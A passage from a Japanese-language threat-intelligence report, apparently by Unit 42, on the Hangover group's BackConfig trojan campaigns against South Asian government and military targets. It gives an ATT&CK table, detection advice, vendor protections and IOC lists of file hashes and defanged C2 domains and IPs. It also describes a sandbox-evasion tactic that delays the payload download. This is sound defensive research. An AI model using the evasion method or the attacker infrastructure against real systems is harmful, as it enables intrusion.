(\u624b\u98064)\u306e\u5b58\u5728\u3092\u78ba\u8a8d\u3057\u3001\u5b58\u5728\u3057\u3066\u3044\u305f\u5834\u5408\u306e\u307f\u52d5\u4f5c\u3092\u7d9a\u3051\u307e\u3059\u3002<\/li>\n<\/ol>\n<\/li>\n<\/ul>\n<p>\u6700\u7d42\u7684\u306b\u306f\u3001XLS\u304c2\u3064\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30c7\u30a3\u30b9\u30af\u306b\u66f8\u304d\u8fbc\u3093\u3067\u3001\u305d\u306e1\u3064\u3067\u3042\u308bBAT\u30d5\u30a1\u30a4\u30eb\u304c\u3059\u3050\u306b\u3044\u304f\u3064\u304b\u306e\u30b7\u30b9\u30c6\u30e0\u8a2d\u5b9a\u3092\u5909\u66f4\u3057\u30012\u3064\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u3053\u306e\u52d5\u4f5c\u3060\u3051\u3067\u306f\u3001\u3053\u308c\u3089\u304c\u60aa\u610f\u306e\u3042\u308b\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u304b\u3069\u3046\u304b\u3092\u5224\u65ad\u3067\u304d\u306a\u3044\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u300220\u5206\u304c\u7d4c\u904e\u3057\u3066\u521d\u3081\u3066\u30bf\u30b9\u30af\u30b9\u30b1\u30b8\u30e5\u30fc\u30e9\u304cVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u5b9f\u884c\u3057\u3066\u3001BackConfig\u30ed\u30fc\u30c0\u30fcEXE\u3092\u8d77\u52d5\u3057\u307e\u3059\u304c\u3001\u305d\u306e\u3068\u304d\u307e\u3067\u306b\u5206\u6790\u30b7\u30b9\u30c6\u30e0\u304c\u76e3\u8996\u3092\u3084\u3081\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u3057\u305f\u304c\u3063\u3066\u3001\u691c\u77e5\u306e\u89b3\u70b9\u3067\u306f\u300120\u5206\u5f8c\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u5f85\u3064\u306e\u3067\u306f\u306a\u304f\u3001Excel\u304b\u3089\u66f8\u304d\u51fa\u3055\u308c\u3066\u5b9f\u884c\u3055\u308c\u305f\u30d0\u30c3\u30c1\u30d5\u30a1\u30a4\u30eb\u306b\u3088\u308b\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u306e\u4f5c\u6210\u3084\u3001\u30d5\u30a1\u30a4\u30eb\u3068\u30d5\u30a9\u30eb\u30c0\u3092\u975e\u8868\u793a\u306b\u8a2d\u5b9a\u3059\u308b\u5c5e\u6027\u5909\u66f4\u3068\u3044\u3063\u305f\u521d\u671f\u6bb5\u968e\u306e\u6319\u52d5\u3092\u76e3\u8996\u5bfe\u8c61\u3068\u3057\u3001\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u306e\u89e3\u6790\u6642\u9593\u3082\u3053\u306e\u9045\u5ef6\u3088\u308a\u9577\u304f\u8a2d\u5b9a\u3059\u308b\u3053\u3068\u304c\u63a8\u5968\u3055\u308c\u307e\u3059\u3002<\/p>\n<h3><a id=\"post-107263-attck\"><\/a>ATT&amp;CK<\/h3>\n<p>\u4ee5\u4e0b\u306e\u8868\u306b\u3001\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u3067\u8aac\u660e\u3057\u305f\u8907\u6570\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u95a2\u9023\u3059\u308bTTP\u3092\u793a\u3057\u307e\u3059\u3002<\/p>\n<table style=\"width: 100%; height: 696px;\">\n<tbody>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 24px;\"><strong><span style=\"font-family: georgia, palatino, serif; font-size: 
12pt;\">\u6226\u8853<\/span><\/strong><\/td>\n<td style=\"width: 80.4969%; height: 24px;\"><strong>\u624b\u6cd5(Mitre ATT&amp;CK ID)<\/strong><\/td>\n<\/tr>\n<tr style=\"height: 56px;\">\n<td style=\"width: 18.5093%; height: 112px;\" rowspan=\"2\">\u6280\u8853\u60c5\u5831\u306e\u53ce\u96c6<\/td>\n<td style=\"width: 80.4969%; height: 56px;\">OSINT\u30c7\u30fc\u30bf\u30bb\u30c3\u30c8\u3068\u60c5\u5831\u306e\u53d6\u5f97(T1247)<\/td>\n<\/tr>\n<tr style=\"height: 56px;\">\n<td style=\"width: 80.4969%; height: 56px;\">\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u306e\u5b9f\u65bd(T1249)<\/td>\n<\/tr>\n<tr style=\"height: 80px;\">\n<td style=\"width: 18.5093%; height: 80px;\">\u653b\u6483\u8005\u306e\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3<\/td>\n<td style=\"width: 80.4969%; height: 80px;\">\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u4fb5\u5bb3\u306b\u3088\u308b\u914d\u4fe1\u652f\u63f4(T1312)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 48px;\" rowspan=\"2\">\u69cb\u7bc9\u6a5f\u80fd<\/td>\n<td style=\"width: 80.4969%; height: 24px;\">\u30ab\u30b9\u30bf\u30e0\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u4f5c\u6210(T1345)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u53d6\u5f97\/\u518d\u4f7f\u7528(T1346)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 24px;\">\u30b9\u30c6\u30fc\u30b8\u6a5f\u80fd<\/td>\n<td style=\"width: 80.4969%; height: 24px;\">\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\/\u30c4\u30fc\u30eb\u306e\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3001\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3001\u304a\u3088\u3073\u8a2d\u5b9a(T1362)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 24px;\">\u521d\u671f\u4fb5\u5bb3<\/td>\n<td style=\"width: 80.4969%; height: 
24px;\">\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0 \u30ea\u30f3\u30af(T1192)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 48px;\" rowspan=\"2\">\u5b9f\u884c<\/td>\n<td style=\"width: 80.4969%; height: 24px;\">\u30e6\u30fc\u30b6\u30fc\u306b\u3088\u308b\u5b9f\u884c(T1204)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u5b9f\u884c\u306e\u60aa\u7528(T1203)<\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"width: 18.5093%; height: 48px;\">\u5b9f\u884c\u3001\u6c38\u7d9a\u5316<\/td>\n<td style=\"width: 80.4969%; height: 48px;\">\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af(T1053)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 96px;\" rowspan=\"4\">\u9632\u5fa1\u56de\u907f<\/td>\n<td style=\"width: 80.4969%; height: 24px;\">\u30b3\u30fc\u30c9\u7f72\u540d(T1116)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u30d5\u30a1\u30a4\u30eb\u307e\u305f\u306f\u60c5\u5831\u306e\u96e3\u8aad\u5316\u89e3\u9664\/\u30c7\u30b3\u30fc\u30c9(T1140)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u96a0\u3057\u30d5\u30a1\u30a4\u30eb\u3068\u96a0\u3057\u30c7\u30a3\u30ec\u30af\u30c8\u30ea(T1158)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u96e3\u8aad\u5316\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u307e\u305f\u306f\u60c5\u5831(T1027)<\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"width: 18.5093%; height: 48px;\">\u9632\u5fa1\u56de\u907f\u3001\u5b9f\u884c<\/td>\n<td style=\"width: 80.4969%; height: 48px;\">\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0(T1064)<\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"width: 18.5093%; height: 48px;\">\u9632\u5fa1\u56de\u907f\u3001\u6c38\u7d9a\u5316<\/td>\n<td style=\"width: 80.4969%; height: 
48px;\">BITS\u30b8\u30e7\u30d6(T1197)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 96px;\" rowspan=\"4\">\u30b3\u30de\u30f3\u30c9&amp;\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb<\/td>\n<td style=\"width: 80.4969%; height: 24px;\">\u4f7f\u7528\u983b\u5ea6\u306e\u9ad8\u3044\u30dd\u30fc\u30c8(T1043)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u6a19\u6e96\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u5c64\u30d7\u30ed\u30c8\u30b3\u30eb(T1071)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u6a19\u6e96\u6697\u53f7\u5316\u30d7\u30ed\u30c8\u30b3\u30eb(T1032)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u30ea\u30e2\u30fc\u30c8 \u30d5\u30a1\u30a4\u30eb \u30b3\u30d4\u30fc(T1105)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>\u7d50\u8ad6<\/h2>\n<p>\u73fe\u5728\u6d3b\u52d5\u4e2d\u306eHangover\u30b0\u30eb\u30fc\u30d7(\u5225\u540dNeon\u3001Viceroy Tiger\u3001MONSOON)\u306f\u3001Unit 42\u304c\u628a\u63e1\u3057\u3066\u3044\u308b\u9650\u308a\u3067\u306f\u3001\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3057\u3066\u304a\u308a\u3001\u6587\u66f8\u307e\u305f\u306f\u653f\u5e9c\u767a\u884c\u306e\u30d5\u30a9\u30fc\u30e0\u3092\u542b\u3080\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u3066\u3001\u4fb5\u5bb3\u3055\u308c\u305fWeb\u30b5\u30a4\u30c8\u3092\u95b2\u89a7\u3059\u308b\u3088\u3046\u306b\u88ab\u5bb3\u8005\u3092\u8a98\u3044\u307e\u3059\u3002\u3053\u306e\u30b5\u30a4\u30c8\u306f\u3001BackConfig\u3068\u3044\u3046\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u5175\u5668\u5316\u3055\u308c\u305fExcel\u6587\u66f8\u3092\u63d0\u4f9b\u3057\u307e\u3059\u3002Unit 
42\u306f\u3001\u307b\u307c\u4f8b\u5916\u306a\u304f\u3001\u30e6\u30fc\u30b6\u30fc\u306b\u3088\u308b\u5b9f\u884c\u3092\u5fc5\u8981\u3068\u3059\u308b\u5175\u5668\u5316\u3055\u308c\u305f\u6587\u66f8\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u306e\u3092\u78ba\u8a8d\u3057\u3066\u3044\u307e\u3059\u3002\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u30c1\u30a7\u30fc\u30f3\u306e\u3069\u306e\u90e8\u5206\u3082\u30e6\u30fc\u30b6\u30fc\u306b\u3088\u308b\u5b9f\u884c\u304c\u5fc5\u8981\u306a\u3044\u3088\u3046\u306b\u3057\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u4f7f\u7528\u3092\u78ba\u8a8d\u3057\u305f\u306e\u306f\u3001\u904e\u53bb6\u304b\u6708\u9593\u30671\u56de\u3060\u3051\u3067\u3059\u3002<\/p>\n<p>BackConfig\u306e\u4e00\u6b21\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u4e8c\u6b21\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u9032\u5316\u306b\u3088\u308a\u3001\u96e3\u8aad\u5316\u3092\u884c\u3046\u5834\u5408\u3068\u884c\u308f\u306a\u3044\u5834\u5408\u306e\u4e21\u65b9\u3067\u3001\u30b3\u30de\u30f3\u30c9\u306e\u5b9f\u884c\u3068\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u5c55\u958b\u306b\u8907\u6570\u306e\u65b9\u6cd5\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u306e\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u6700\u65b0\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u306f\u3001\u30bf\u30a4\u30df\u30f3\u30b0\u826f\u304f\u77ed\u671f\u9593\u3067\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u5c55\u958b\u3057\u3066\u6210\u529f\u78ba\u7387\u3092\u6700\u5927\u5316\u3059\u308b\u305f\u3081\u306b\u3001\u30e2\u30b8\u30e5\u30e9\u30fc\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u4f7f\u7528\u3057\u3066\u30b3\u30fc\u30c9\u3092\u66f4\u65b0\u304a\u3088\u3073\u518d\u4f7f\u7528\u3057\u3084\u3059\u304f\u3057\u3066\u3044\u307e\u3059\u3002\u6700\u65b0\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c\u65b9\u6cd5\u306f\u3001\u30b0\u30eb\u30fc\u30d7\u304c\u3001\u60aa\u610f\u306e\u3042\u308b\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u305d\u308c\u305e\u308c\u304c\u6bd4\u8f03\u76
84\u5b89\u5168\u306b\u898b\u3048\u308b\u584a\u306b\u5206\u5272\u3059\u308b\u3053\u3068\u306b\u3088\u3063\u3066\u3001\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u3084\u4ed6\u306e\u81ea\u52d5\u5206\u6790\u30b7\u30b9\u30c6\u30e0\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u3053\u3068\u3082\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h3>\u4fdd\u8b77<\/h3>\n<table>\n<tbody>\n<tr>\n<td><img  class=\"alignnone wp-image-107276 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/word-image-76.png\" alt=\"\" width=\"150\" height=\"122\" \/><\/td>\n<td>Cortex XDR\u306f\u3001SilverTerrier\u306e\u653b\u6483\u8005\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u3066\u3044\u308b\u3059\u3079\u3066\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3001\u304a\u3088\u3073\u30d5\u30a1\u30a4\u30eb\u30ec\u30b9\u653b\u6483\u304b\u3089\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8\u3092\u4fdd\u8b77\u3057\u307e\u3059\u3002<\/td>\n<\/tr>\n<tr>\n<td><img  class=\"alignnone wp-image-107278 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/word-image-77.png\" alt=\"\" width=\"150\" height=\"149\" \/><\/td>\n<td>WildFire\u00ae\u30af\u30e9\u30a6\u30c9\u30d9\u30fc\u30b9\u8105\u5a01\u5206\u6790\u30b5\u30fc\u30d3\u30b9\u306f\u3001\u3053\u308c\u3089\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u305f\u30b5\u30f3\u30d7\u30eb\u3092\u6b63\u78ba\u306b\u8b58\u5225\u3057\u307e\u3059\u3002<\/td>\n<\/tr>\n<tr>\n<td><img  class=\"alignnone wp-image-107280 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/word-image-78.png\" alt=\"\" width=\"150\" height=\"183\" 
\/><\/td>\n<td>\u8105\u5a01\u9632\u5fa1\u306f\u3001\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u5074\u3068\u30b5\u30fc\u30d0\u30fc\u5074\u306e\u65e2\u77e5\u306e\u8106\u5f31\u6027\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u3001\u304a\u3088\u3073Hangover\u653b\u6483\u8005\u304c\u4f7f\u7528\u3059\u308b\u30b3\u30de\u30f3\u30c9&amp;\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306b\u5bfe\u3059\u308b\u4fdd\u8b77\u3092\u63d0\u4f9b\u3057\u307e\u3059\u3002<\/td>\n<\/tr>\n<tr>\n<td><img  class=\"alignnone wp-image-107282 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/word-image-79.png\" alt=\"\" width=\"150\" height=\"192\" \/><\/td>\n<td>URL\u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0\u306f\u3001Hangover\u653b\u6483\u8005\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u308b\u3059\u3079\u3066\u306e\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30c9\u30e1\u30a4\u30f3\u3068\u30de\u30eb\u30a6\u30a7\u30a2\u30c9\u30e1\u30a4\u30f3\u3092\u8b58\u5225\u3057\u3066\u3001Hangover\u653b\u6483\u8005\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u308b\u65b0\u3057\u3044\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u304c\u5175\u5668\u5316\u3055\u308c\u308b\u524d\u306b\u4e88\u9632\u7684\u306b\u30d5\u30e9\u30b0\u3092\u4ed8\u3051\u307e\u3059\u3002<\/td>\n<\/tr>\n<tr>\n<td><img  class=\"alignnone wp-image-107284 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/word-image-80.png\" alt=\"\" width=\"150\" height=\"150\" \/><\/td>\n<td>AutoFocus&#x2122;\u30b3\u30f3\u30c6\u30ad\u30b9\u30c8\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u30b5\u30fc\u30d3\u30b9\u306e\u30e6\u30fc\u30b6\u30fc\u306f\u3001\u4ee5\u4e0b\u306e\u30bf\u30b0\u3092\u4f7f\u7528\u3057\u3066\u3053\u308c\u3089\u306e\u653b\u6483\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u305f\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u8868\u793a\u3067\u304d\u307e\u3059\u3002<br 
\/>\n<a href=\"https:\/\/autofocus.paloaltonetworks.com\/#\/tag\/Unit42.Hangover\">Hangover\u30b0\u30eb\u30fc\u30d7<\/a>\u3068<a href=\"https:\/\/autofocus.paloaltonetworks.com\/#\/tag\/Unit42.BackConfig\">BackConfig\u30de\u30eb\u30a6\u30a7\u30a2<\/a>\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001<a href=\"https:\/\/autofocus.paloaltonetworks.com\">AutoFocus\u306e\u30b5\u30a4\u30c8<\/a>\u3067\u78ba\u8a8d\u3067\u304d\u307e\u3059\u3002<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306f\u3001\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306e\u30d5\u30a1\u30a4\u30eb\u30b5\u30f3\u30d7\u30eb\u3084IOC\u306a\u3069\u306e\u5f0a\u793e\u306e\u8abf\u67fb\u7d50\u679c\u3092\u3001\u63d0\u643a\u7d44\u7e54\u3067\u3042\u308bCyber Threat Alliance (\u30b5\u30a4\u30d0\u30fc\u8105\u5a01\u30a2\u30e9\u30a4\u30a2\u30f3\u30b9)\u306e\u30e1\u30f3\u30d0\u30fc\u3068\u5171\u6709\u3057\u3066\u3044\u307e\u3059\u3002CTA\u306e\u30e1\u30f3\u30d0\u30fc\u306f\u3001\u3053\u306e\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u3092\u4f7f\u7528\u3057\u3066\u3001\u9867\u5ba2\u306b\u8fc5\u901f\u306b\u4fdd\u8b77\u3092\u5c0e\u5165\u3057\u3001\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u8005\u3092\u4f53\u7cfb\u7684\u306b\u58ca\u6ec5\u3055\u305b\u307e\u3059\u3002Cyber Threat Alliance\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001<a href=\"https:\/\/www.cyberthreatalliance.org\/\">www.cyberthreatalliance.org<\/a>\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044<em>(\u3053\u308c\u306fCTA\u3068\u4e8b\u524d\u306b\u5171\u6709\u3057\u3066\u3044\u308b\u30d6\u30ed\u30b0\u306b\u8ffd\u52a0\u3055\u308c\u307e\u3059\u3002WordPress\u306b\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u9069\u5207\u306a\u30bf\u30a4\u30df\u30f3\u30b0\u3067\u8ffd\u52a0\u3055\u308c\u307e\u3059)\u3002<\/em><\/p>\n<h3><a id=\"post-107263-indicators-of-compromise\"><\/a>IOC<\/h3>\n<h4><a 
id=\"post-107263-delivery-documents\"><\/a><strong>\u914d\u4fe1\u6587\u66f8<\/strong><\/h4>\n<ul>\n<li>56349cf3188a36429c207d425dd92d8d57553b1f43648914b44965de2bd63dd6<\/li>\n<li>8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c<\/li>\n<li>021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b<\/li>\n<li>be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461<\/li>\n<li>0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf<\/li>\n<li>ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb<\/li>\n<li>752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f (CVE-2017-11882\u3092\u4f7f\u7528\u3059\u308bRTF)<\/li>\n<\/ul>\n<h4><a id=\"post-107263-batch-files\"><\/a><strong>\u30d0\u30c3\u30c1\u30d5\u30a1\u30a4\u30eb<\/strong><\/h4>\n<ul>\n<li>4BAFBF6000A003EB03F31023945A101813654D26B7F3E402D1F51B7608B93BCB (Audio.txt\/Naya Housing\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u304b\u3089\u6d41\u7528\u3057\u305f.bat)<\/li>\n<li>C94f7733fc9bdbcb503efd000e5aef66d494291ae40fc516bb040b0d1d8b46c9<\/li>\n<li>6a35d4158a5cb8e764777ba05c3d7d8a93a3865b24550bfb2eb8756c11b57be3<\/li>\n<li>750fc47d8aa8c9ae7955291b9736e8292f02aaaa4f8118015e6927f78297f580<\/li>\n<li>5292f4b4f38d41942016cf4b154b1ec65bb33dbc193a7e222270d4eea3578295<\/li>\n<li>f64dbcd8b75efe7f4fa0c2881f0d62982773f33dcfd77cccb4afc64021af2d9e<\/li>\n<li>98d27e830099c82b9807f19dcef1a25d7fce2c79a048d169a710b272e3f62f6e<\/li>\n<li>29c5dd19b577162fe76a623d9a6dc558cfbd6cddca64ed53e870fe4b66b44096 (driverkit.bat)<\/li>\n<li>abe82ffb8a8576dca8560799a082013a7830404bb235cb29482bc5038145b003 (Winmgt_Drive.bat\u306fbitsadmin\u3092\u4f7f\u7528)<\/li>\n<li>02c306bb120148791418136dcea8eb93f8e97fb51b6657fd9468c73fb5ea786c<\/li>\n<\/ul>\n<h4><a id=\"post-107263-vbs-files\"><\/a><strong>VBS\u30d5\u30a1\u30a4\u30eb<\/strong><\/h4>\n<ul>\n<li>87e8c46d065ace580b1ed28565d1fddaa6df49da1ba83f7b3e9982cd8a0013f1 (One_drivers.txt\/Naya 
Housing\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u304b\u3089\u6d41\u7528\u3057\u305f.vbs)<\/li>\n<li>952d4a9891a75e25e1c31a0514b97345ca0d8f240cdd4a57c8b3ff8a651a231a (Down_LinkLog.vbs)<\/li>\n<li>a1cd89a684db41206fc71efe327ef608652931e749c24a3232908824cea426bb (Winmgt.vbs\u306fBITS\u3092\u4f7f\u7528)<\/li>\n<\/ul>\n<h4><a id=\"post-107263-exe-payloads\"><\/a><strong>EXE\u30da\u30a4\u30ed\u30fc\u30c9<\/strong><\/h4>\n<ul>\n<li>306fe259a250b2f0d939322cfb97787c4076c357fc9eb1f1cc10b0060f27f644<\/li>\n<li>0f11fb955df07afc1912312f276c7fa3794ab85cd9f03b197c8bdbefb215fe92<\/li>\n<li>84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c<\/li>\n<li>18ce3eebbb093a218a8f566b579a5784caee94fadcda8f8c0d21f214ce2bd8b9<\/li>\n<li>922d6e68ecac6dbfdd1985c2fae43e2fc88627df810897e3068d126169977709<\/li>\n<li>4a4bc01b20dd2aaa2a2434dc677a44cc85d9533bed30bc58b8026b877db028d5<\/li>\n<li>677d4982d714bb47fab613ebe1921005509ed0d1e8965e7241994e38c3ade9f2<\/li>\n<li>d3013204f1a151c72879afc213dca3cada8c3ea617156b37771bdd7b7b74057f<\/li>\n<li>91c67c1cda67b60c82e14a5c32d79a4236f5a82136317162dfbde1a6054cf8c1<\/li>\n<li>de5b670656cbdbcf11607f01a6f93644765d9647ddab39b54946170b33f7ac9a<\/li>\n<li>f79ebf038c7731ea3a19628cb329cada4ebb18f17439d9c6cf19d361b0494e7b<\/li>\n<li>9e141fe67521b75412419a8c88c199c8ebd2a135c7a8b58edced454fbc33cb77<\/li>\n<li>6787242a810f8a5e1423e83790064a0a98954ab0802a90649fdd55a47d75695e<\/li>\n<li>e28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f<\/li>\n<li>07c97b253452a2a8eb7753ed8c333efeaa3546c005ffcfb5b3d71dc61c49abda<\/li>\n<li>31faeefb4dc4e54b747387bb54a5213118970ccb2f141559f8e2b4dbfdbeb848<\/li>\n<li>15109962da4899949863447bfdf6a6de87a8876f92adb7577392032df44ec892<\/li>\n<li>D87b875b8641c538f90fe68cad4e9bdc89237dba137e934f80996e8731059861<\/li>\n<li>167c7d7c08d318bc40e552e6e32715a869d2d62ba0305752b9b9bece6b9e337e<\/li>\n<li>4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd 
(\u904e\u53bb\u306e\u4e00\u9023\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u306e\u4f8b)<\/li>\n<li>b18697e999ed5859bfbc03e1d6e900752e1cdcd85ddb71729e2b38161366e5b5 (driverkit.zip)<\/li>\n<\/ul>\n<h4><a id=\"post-107263-infrastructure\"><\/a><strong>\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3<\/strong><\/h4>\n<ul>\n<li>linkrequest[.]live (23.106.123[.]87)<\/li>\n<li>matissues[.]com<\/li>\n<li>unique.fontsupdate[.]com<\/li>\n<li>185.203.119[.]184<\/li>\n<li>212.114.52[.]148<\/li>\n<\/ul>\n<h4><a id=\"post-107263-digital-signatures\"><\/a><strong>\u30c7\u30b8\u30bf\u30eb\u7f72\u540d<\/strong><\/h4>\n<p>\u4ee5\u4e0b\u306b\u793a\u3059\u81ea\u5df1\u7f72\u540d\u30c7\u30b8\u30bf\u30eb\u8a3c\u660e\u66f8\u306e\u30ea\u30b9\u30c8\u306f\u7db2\u7f85\u7684\u306a\u30ea\u30b9\u30c8\u3067\u306f\u306a\u304f\u3001\u904e\u53bb12\u304b\u6708\u9593\u306bBackConfig 